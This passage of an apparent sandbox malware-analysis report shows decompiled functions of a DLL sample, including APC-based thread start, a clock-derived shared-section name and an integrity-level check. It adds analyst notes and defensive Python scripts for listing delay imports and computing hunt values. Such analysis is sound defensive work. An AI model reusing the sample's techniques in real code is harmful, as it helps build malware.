                                							L13:
                                							if(InterlockedExchange(_v28, _t138) == _t138) {
                                								FreeLibrary(_t138);
                                							} else {
                                								if(_t139[6] != 0) {
                                									_t102 = LocalAlloc(0x40, 8);
                                									if(_t102 != 0) {
                                										 *(_t102 + 4) = _t139;
                                										_t125 =  *0xd4d198; // 0x0
                                										 *_t102 = _t125;
                                										 *0xd4d198 = _t102;
                                									}
                                								}
                                							}
                                							goto L18;
                                						}
                                						_v40 = GetLastError();
                                						_t104 =  *0xd4d19c; // 0x0
                                						if(_t104 == 0) {
                                							L12:
                                							_a8 =  &_v72;
                                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                							return _v44;
                                						}
                                						_t138 =  *_t104(3,  &_v72);
                                						if(_t138 != 0) {
                                							goto L13;
                                						}
                                						goto L12;
                                					}
                                					_t138 =  *_t98(1,  &_v72);
                                					if(_t138 != 0) {
                                						goto L13;
                                					}
                                					goto L9;
                                				}
                                				_t116 =  *_t82(0,  &_v72);
                                				if(_t116 != 0) {
                                					goto L33;
                                				}
                                				goto L6;
                                			}

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4AD0E
                                • LoadLibraryA.KERNEL32(?), ref: 00D4AD8B
                                • GetLastError.KERNEL32 ref: 00D4AD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00D4ADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                 • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                 • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: 33ec94f2f8c62f028991db881814369e2ea2789912e94bef49eea29af5a059c5
                                • Instruction ID: b2e1ec75b42d725a5cbf82bee6c6d88233db9304317a2324f43c772652029698
                                • Opcode Fuzzy Hash: 33ec94f2f8c62f028991db881814369e2ea2789912e94bef49eea29af5a059c5
                                • Instruction Fuzzy Hash: C38118B5A40305AFDB20CFA9D884AAEB7F5EF58310F188029F955E7350EB70E905CB61
                                Uniqueness

                                Uniqueness Score: -1.00%
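E00D4AC95 is the compiler's delay-load helper rather than sample-specific code: it reads an ImgDelayDescr (grAttrs, rvaDLLName, rvaHmod, rvaIAT, rvaINT, rvaBoundIAT, rvaUnloadIAT, dwTimeStamp at _t139[0..7], each RVA rebased on 0xD40000), fills a 0x24-byte DelayLoadInfo, dispatches notification codes 0..5 through the two hook pointers at 0xD4D1A0 and 0xD4D19C, keeps an unload list headed at 0xD4D198, and raises the VcppException codes 0xC06D0057, 0xC06D007E and 0xC06D007F (ERROR_INVALID_PARAMETER, ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND) that delayimp.h's __delayLoadHelper2 uses. The INT thunk decides ordinal versus name through bit 31, exactly as `!(_t133 >> 0x1f) & 1` does, and a name thunk is used at +2 to skip the IMAGE_IMPORT_BY_NAME hint. The triage consequence is that anything resolved through this helper lives in data directory 13, not in the regular import table, so an import listing that stops at the IAT can miss it; whether this sample's WinINet calls resolve that way is not shown on this page. The script below is an added example (not part of the report and not the sample's code) that enumerates the delay-load directory of a PE32 file with only the standard library. The PE it builds for its self-test is constructed, and the WININET.dll entries in it are chosen for illustration.

```python
import struct

DELAY_IMPORT_DIR = 13            # IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT
ORDINAL_FLAG32 = 0x80000000      # IMAGE_ORDINAL_FLAG32: bit 31 of an INT thunk


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset via the section table."""
    for vsize, va, rsize, raw in sections:
        if va <= rva < va + max(vsize, rsize):
            return rva - va + raw
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def parse_delay_imports(data):
    """Return {dll: [("name", sym) | ("ordinal", n), ...]} from the delay-load
    directory of a PE32 image. Mirrors the run-time helper: ImgDelayDescr fields
    are RVAs when grAttrs bit 0 (dlattrRva) is set, otherwise they are VAs and
    the image base is subtracted (the helper itself raises 0xC06D0057 then)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe, = struct.unpack_from("<I", data, 0x3C)
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsec, = struct.unpack_from("<H", data, pe + 6)
    opt_size, = struct.unpack_from("<H", data, pe + 20)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here (the sample is 32-bit)")
    image_base, = struct.unpack_from("<I", data, opt + 28)
    ndirs, = struct.unpack_from("<I", data, opt + 92)
    if ndirs <= DELAY_IMPORT_DIR:
        return {}
    dir_rva, _ = struct.unpack_from("<II", data, opt + 96 + 8 * DELAY_IMPORT_DIR)
    if dir_rva == 0:
        return {}
    # (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section
    sections = [struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
                for i in range(nsec)]
    result, off = {}, _rva_to_off(sections, dir_rva)
    while True:
        desc = struct.unpack_from("<8I", data, off)        # ImgDelayDescr, 32 bytes
        if not any(desc):
            break
        attrs, name_rva, _hmod, _iat, int_rva, _bound, _unload, _stamp = desc
        fix = 0 if attrs & 1 else image_base
        entries = []
        t = _rva_to_off(sections, int_rva - fix)
        while True:
            thunk, = struct.unpack_from("<I", data, t)
            if thunk == 0:
                break
            if thunk & ORDINAL_FLAG32:
                entries.append(("ordinal", thunk & 0xFFFF))
            else:  # IMAGE_IMPORT_BY_NAME: WORD hint, then the symbol name
                entries.append(("name", _cstr(data, _rva_to_off(sections, thunk - fix) + 2)))
            t += 4
        result[_cstr(data, _rva_to_off(sections, name_rva - fix))] = entries
        off += 32
    return result


def build_sample_pe():
    """Constructed minimal PE32 (not the analysed sample): one section at
    RVA 0x1000 / file offset 0x200 holding a single delay-import descriptor."""
    base, sec_rva, sec_raw = 0x00D40000, 0x1000, 0x200
    sec = bytearray(0x200)
    # grAttrs=dlattrRva, rvaDLLName, rvaHmod, rvaIAT, rvaINT, rvaBoundIAT, rvaUnloadIAT, dwTimeStamp
    struct.pack_into("<8I", sec, 0x00, 1, sec_rva + 0x40, sec_rva + 0x50,
                     sec_rva + 0x60, sec_rva + 0x70, 0, 0, 0)
    sec[0x40:0x4C] = b"WININET.dll\0"
    struct.pack_into("<4I", sec, 0x70, sec_rva + 0x80, ORDINAL_FLAG32 | 18, sec_rva + 0x90, 0)
    sec[0x80:0x90] = b"\0\0InternetOpenA\0"
    sec[0x90:0xA1] = b"\0\0HttpQueryInfoA\0"
    hdr = bytearray(sec_raw)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                       # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x84, 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = 0x98
    struct.pack_into("<H", hdr, opt, 0x10B)                       # PE32 magic
    struct.pack_into("<I", hdr, opt + 28, base)                   # ImageBase
    struct.pack_into("<I", hdr, opt + 92, 16)                     # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96 + 8 * DELAY_IMPORT_DIR, sec_rva, 0x40)
    hdr[opt + 224:opt + 232] = b".rdata\0\0"
    struct.pack_into("<IIII", hdr, opt + 232, 0x200, sec_rva, 0x200, sec_raw)
    return bytes(hdr + sec)


if __name__ == "__main__":
    for dll, syms in parse_delay_imports(build_sample_pe()).items():
        print(dll, syms)
```

On a real file call `parse_delay_imports(open(path, "rb").read())` and compare the result with the normal import listing; pefile's DIRECTORY_ENTRY_DELAY_IMPORT produces the same view where that library is available.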

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E00D48E0D(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L00D4AF68();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0xd4d2a8; // 0x253a5a8
                                				_t5 = _t13 + 0xd4e87e; // 0x3288e26
                                				_t6 = _t13 + 0xd4e59c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L00D4AC0A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0xd4d2ac, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00D42FFF,?,?,4D283A53,?,?), ref: 00D48E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00D48E2F
                                • _snwprintf.NTDLL ref: 00D48E54
                                • CreateFileMappingW.KERNELBASE(000000FF,00D4D2AC,00000004,00000000,00001000,?), ref: 00D48E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D42FFF,?,?,4D283A53), ref: 00D48E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00D48E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D42FFF,?,?), ref: 00D48EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D42FFF,?,?,4D283A53), ref: 00D48EC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                 • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                 • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                 • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: d6c514ce42e079459751dcd7ffd0f397aacd6ecebb9fc9f0851d398e696eb59f
                                • Instruction ID: f47ae9daba3539f9ab77ed5d91b9cf6ad71156da9932ca1b37e4cbf03c9162ca
                                • Opcode Fuzzy Hash: d6c514ce42e079459751dcd7ffd0f397aacd6ecebb9fc9f0851d398e696eb59f
                                • Instruction Fuzzy Hash: 4A21DFBAA41304FBC721EFA8CC05F9E77B9AB84750F240120FA05E72D0DA71D904ABB0
                                Uniqueness

                                Uniqueness Score: -1.00%
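E00D48E0D derives the name of a shared section from the clock: GetSystemTimeAsFileTime, then _aulldiv by the 64-bit constant 0x192_54D38000. That divisor is exactly 1,728,000,000,000 = 2 x 86400 x 10^7, so the quotient is the number of two-day periods elapsed since 1601-01-01 UTC and the resulting name rolls over every second day at 00:00 UTC. The format string is resolved at run time from the global at 0xD4D2A8 and is not recovered on this page, so only the numeric component can be reproduced. Note the inverted success condition as well: the handle and a FILE_MAP_READ|FILE_MAP_WRITE (6) view are returned only when CreateFileMappingW reports ERROR_ALREADY_EXISTS (0xB7); a freshly created mapping is closed again and ERROR_FILE_NOT_FOUND (2) is returned, so this routine attaches to a section that another component has already created. The following is an added example (not from the report or the sample) that reproduces the quotient with exact integer arithmetic and lists every value a hunt over a time window has to try; the timestamps are constructed.

```python
import datetime as dt

UTC = dt.timezone.utc
FILETIME_EPOCH = dt.datetime(1601, 1, 1, tzinfo=UTC)
# 0x192_54D38000 == 1_728_000_000_000 == 2 days * 86400 s * 10^7 ticks/s
PERIOD_TICKS = 0x192_54D38000


def to_filetime(when):
    """UTC datetime -> Windows FILETIME (100 ns ticks since 1601-01-01).
    Integer arithmetic throughout: a float timestamp loses precision at 1e17."""
    if when.tzinfo is None:
        when = when.replace(tzinfo=UTC)      # assumption: naive values are UTC
    d = when.astimezone(UTC) - FILETIME_EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def period_number(when):
    """The quotient E00D48E0D hands to _snwprintf: FILETIME // PERIOD_TICKS.
    Fits in 32 bits for centuries, so pushing only the low DWORD is lossless."""
    return to_filetime(when) // PERIOD_TICKS


def period_start(n):
    """UTC instant at which period n begins (bounds the object's lifetime)."""
    return FILETIME_EPOCH + dt.timedelta(microseconds=n * PERIOD_TICKS // 10)


def candidates(start, end):
    """Every period number live at some point in [start, end]. A hunt for the
    named section must try each one, because the name changes at the
    two-day boundary and a long-running host keeps the earlier mapping open."""
    return list(range(period_number(start), period_number(end) + 1))


if __name__ == "__main__":
    now = dt.datetime.now(UTC)
    n = period_number(now)
    print(f"current period {n}, started {period_start(n)}, next at {period_start(n + 1)}")
```

The value itself is only half of the object name: combine it with the format string recovered from a memory dump or a runtime hook on _snwprintf before searching handles or object directories for it.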

                                 Control-flow Graph

                                 • Executed
                                 • Not Executed
                                 (graph rendered in the original; blocks 1000188f to 10001968, API-annotated blocks: InterlockedIncrement at 100018ac; InterlockedDecrement at 10001914; SleepEx at 10001930; CloseHandle at 10001949; HeapDestroy at 10001955; calls to 10001c93 and 10001fb2 at 100018d5)
                                C-Code - Quality: 86%
                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                				long _v8;
                                				void* __edi;
                                				void* __esi;
                                				void* __ebp;
                                				char _t9;
                                				void* _t10;
                                				void* _t18;
                                				void* _t23;
                                				void* _t36;
                                
                                				_push(__ecx);
                                				_t9 = _a8;
                                				_v8 = 1;
                                				if(_t9 == 0) {
                                					_t10 = InterlockedDecrement(0x10004108);
                                					__eflags = _t10;
                                					if(_t10 == 0) {
                                						__eflags =  *0x1000410c;
                                						if( *0x1000410c != 0) {
                                							_t36 = 0x2328;
                                							while(1) {
                                								SleepEx(0x64, 1);
                                								__eflags =  *0x10004118;
                                								if( *0x10004118 == 0) {
                                									break;
                                								}
                                								_t36 = _t36 - 0x64;
                                								__eflags = _t36;
                                								if(_t36 > 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							CloseHandle( *0x1000410c);
                                						}
                                						HeapDestroy( *0x10004110);
                                					}
                                				} else {
                                					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
                                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                						 *0x10004110 = _t18;
                                						_t41 = _t18;
                                						if(_t18 == 0) {
                                							L6:
                                							_v8 = 0;
                                						} else {
                                							 *0x10004130 = _a4;
                                							asm("lock xadd [eax], edi");
                                							_push( &_a8);
                                							_t23 = E10001FB2(E10001CE7, E10001C93(_a12, 1, 0x10004118, _t41));
                                							 *0x1000410c = _t23;
                                							if(_t23 == 0) {
                                								asm("lock xadd [esi], eax");
                                								goto L6;
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                APIs
                                • InterlockedIncrement.KERNEL32(10004108), ref: 100018B1
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 100018C6
                                  • Part of subcall function 10001FB2: CreateThread.KERNEL32 ref: 10001FC9
                                  • Part of subcall function 10001FB2: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                  • Part of subcall function 10001FB2: GetLastError.KERNEL32(00000000), ref: 10001FE9
                                  • Part of subcall function 10001FB2: TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                  • Part of subcall function 10001FB2: CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                  • Part of subcall function 10001FB2: SetLastError.KERNEL32(00000000), ref: 10002003
                                • InterlockedDecrement.KERNEL32(10004108), ref: 10001919
                                • SleepEx.KERNEL32(00000064,00000001), ref: 10001933
                                • CloseHandle.KERNEL32 ref: 1000194F
                                • HeapDestroy.KERNEL32 ref: 1000195B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                • String ID: Tt
                                • API String ID: 2110400756-3291821022
                                • Opcode ID: 231681a82db69a04dd5d25b71a6b4fa3b4976ebb6fe9f58478b6d6b933b100f7
                                • Instruction ID: 29134dd7f3199aa2df81569bc46c6dd4be899e0037607ac4421cb920fb4b24cd
                                • Opcode Fuzzy Hash: 231681a82db69a04dd5d25b71a6b4fa3b4976ebb6fe9f58478b6d6b933b100f7
                                • Instruction Fuzzy Hash: F721A5B1501225AFF701DF69CCD8ACA7BE8F7553E07128135F605E3168DB309E808B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Blocks:
                                • 248: 10001fb2-10001fd3 CreateThread
                                • 249: 10001fd5-10001fe6 QueueUserAPC
                                • 250: 1000200a-1000200d
                                • 251: 10001fe8-10002009 TerminateThread CloseHandle SetLastError
                                Edges: 248->249, 248->250, 249->250, 249->251, 251->250
                                C-Code - Quality: 100%
                                			E10001FB2(long _a4, DWORD* _a12) {
                                				_Unknown_base(*)()* _v0;
                                				void* _t4;
                                				long _t6;
                                				long _t11;
                                				void* _t13;
                                
                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
                                				_t13 = _t4;
                                				if(_t13 != 0) {
                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                					if(_t6 == 0) {
                                						_t11 = GetLastError();
                                						TerminateThread(_t13, _t11);
                                						CloseHandle(_t13);
                                						_t13 = 0;
                                						SetLastError(_t11);
                                					}
                                				}
                                				return _t13;
                                			}

                                APIs
                                • CreateThread.KERNEL32 ref: 10001FC9
                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                • GetLastError.KERNEL32(00000000), ref: 10001FE9
                                • TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                • CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                • SetLastError.KERNEL32(00000000), ref: 10002003
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                • String ID: @Mt MtTt
                                • API String ID: 3832013932-608512568
                                • Opcode ID: db2b7afd92f1f10511345ff4ebaf5267084b9dcc4c770caee6057864447a89a8
                                • Instruction ID: ce2c0407e613e175972c0e078a1766e58809613f973274f1339e8cc1b503390c
                                • Opcode Fuzzy Hash: db2b7afd92f1f10511345ff4ebaf5267084b9dcc4c770caee6057864447a89a8
                                • Instruction Fuzzy Hash: 75F0F832A06731BBF3235BA19CD8F5BBFADFB087D2F018504F60591168C72198108BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Blocks:
                                • 253: d458db-d458e6
                                • 254: d458f2-d45905
                                • 255: d458e8-d458ed call d429c0
                                • 257: d45907-d4590e InternetSetStatusCallback InternetCloseHandle
                                • 258: d45910-d45915
                                • 259: d45917-d4591e InternetSetStatusCallback InternetCloseHandle
                                • 260: d45920-d45925
                                • 261: d45927-d4592e InternetSetStatusCallback InternetCloseHandle
                                • 262: d45930-d4593b
                                • 263: d45940-d45945
                                • 264: d4593d-d4593e CloseHandle
                                • 265: d45947-d45948 CloseHandle
                                • 266: d4594a-d45951
                                • 267: d45953-d4595c call d48b22
                                • 268: d4595f-d45964
                                • 270: d45966-d45967 call d48b22
                                • 271: d4596c-d45970
                                • 274: d45972-d45973 call d48b22
                                • 275: d45978-d4597d
                                • 277: d45985-d45987
                                • 278: d4597f-d45980 call d48b22
                                Edges: 253->254, 253->255, 254->257, 254->258, 255->254, 257->258, 258->259, 258->260, 259->260, 260->261, 260->262, 261->262, 262->263, 262->264, 263->265, 263->266, 264->263, 265->266, 266->267, 266->268, 267->268, 268->270, 268->271, 270->271, 271->274, 271->275, 274->275, 275->277, 275->278, 278->277
                                C-Code - Quality: 93%
                                			E00D458DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                				void* _t21;
                                				intOrPtr _t24;
                                				void* _t37;
                                				void* _t41;
                                				intOrPtr* _t45;
                                
                                				_t41 = __edi;
                                				_t37 = __ebx;
                                				_t45 = __eax;
                                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                					E00D429C0(_t16, __ecx, 0xea60);
                                				}
                                				_t17 =  *(_t45 + 0x18);
                                				_push(_t37);
                                				_push(_t41);
                                				if(_t17 != 0) {
                                					InternetSetStatusCallback(_t17, 0);
                                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                				}
                                				_t18 =  *(_t45 + 0x14);
                                				if(_t18 != 0) {
                                					InternetSetStatusCallback(_t18, 0);
                                					InternetCloseHandle( *(_t45 + 0x14));
                                				}
                                				_t19 =  *(_t45 + 0x10);
                                				if(_t19 != 0) {
                                					InternetSetStatusCallback(_t19, 0);
                                					InternetCloseHandle( *(_t45 + 0x10));
                                				}
                                				_t20 =  *(_t45 + 0x1c);
                                				if(_t20 != 0) {
                                					CloseHandle(_t20);
                                				}
                                				_t21 =  *(_t45 + 0x20);
                                				if(_t21 != 0) {
                                					CloseHandle(_t21);
                                				}
                                				_t22 =  *((intOrPtr*)(_t45 + 8));
                                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                					E00D48B22(_t22);
                                					 *((intOrPtr*)(_t45 + 8)) = 0;
                                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                				}
                                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                					E00D48B22(_t23);
                                				}
                                				_t24 =  *_t45;
                                				if(_t24 != 0) {
                                					_t24 = E00D48B22(_t24);
                                				}
                                				_t46 =  *((intOrPtr*)(_t45 + 4));
                                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                					return E00D48B22(_t46);
                                				}
                                				return _t24;
                                			}

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 00D45909
                                • InternetCloseHandle.WININET(?), ref: 00D4590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 00D45919
                                • InternetCloseHandle.WININET(?), ref: 00D4591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 00D45929
                                • InternetCloseHandle.WININET(?), ref: 00D4592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,00D493DC,?,?,00000000,00000000,74E481D0), ref: 00D4593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,00D493DC,?,?,00000000,00000000,74E481D0), ref: 00D45948
                                  • Part of subcall function 00D429C0: WaitForMultipleObjects.KERNEL32(00000002,00D4A923,00000000,00D4A923,?,?,?,00D4A923,0000EA60), ref: 00D429DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: 119ae198a91de30c24545b11ed439bf7a7158c562cf55651d622aa26360812dd
                                • Instruction ID: 5bf5badbcce346384a2cc833b59569d19a6f207e6d60e584f394d58a9062f1a4
                                • Opcode Fuzzy Hash: 119ae198a91de30c24545b11ed439bf7a7158c562cf55651d622aa26360812dd
                                • Instruction Fuzzy Hash: 5711AD76600B58ABC630AFAAEC84C1BF7E9FF453603994D19F196D3516CB21FC448A74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Blocks:
                                • 292: d4a2c6-d4a2e1
                                • 293: d4a2e7-d4a300 OpenProcessToken
                                • 294: d4a380-d4a38c
                                • 295: d4a302-d4a32d GetTokenInformation * 2
                                • 296: d4a37f
                                • 297: d4a375-d4a37e CloseHandle
                                • 298: d4a32f-d4a33c call d41525
                                • 301: d4a374
                                • 302: d4a33e-d4a34f GetTokenInformation
                                • 303: d4a351-d4a36b GetSidSubAuthorityCount GetSidSubAuthority
                                • 304: d4a36e-d4a36f call d48b22
                                Edges: 292->293, 292->294, 293->295, 293->296, 295->297, 295->298, 296->294, 297->296, 298->301, 298->302, 301->297, 302->303, 302->304, 303->304, 304->301
                                C-Code - Quality: 100%
                                			E00D4A2C6(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0xd4d25c > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E00D41525(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E00D48B22(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00D4A2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00D4A318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D4A328
                                • CloseHandle.KERNEL32(00000000), ref: 00D4A378
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00D4A34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D4A353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D4A363
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 2f00e1d3fe981794bd4b58ef389acbd73bd565f62641a2f3ba50b2aa587b39e2
                                • Instruction ID: 7b2a7a69f67ed90abb8f5855ad1f70e8e8e34aa7b3ff64cda70d4ceafb675ff0
                                • Opcode Fuzzy Hash: 2f00e1d3fe981794bd4b58ef389acbd73bd565f62641a2f3ba50b2aa587b39e2
                                • Instruction Fuzzy Hash: 7D213979900248FFEB109FA4DC88EEEBBB9EB49304F1440A5F510A62A1D7719E45EF70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Blocks:
                                • 347: 10001015-10001027 call 10001b5a
                                • 350: 100010e8
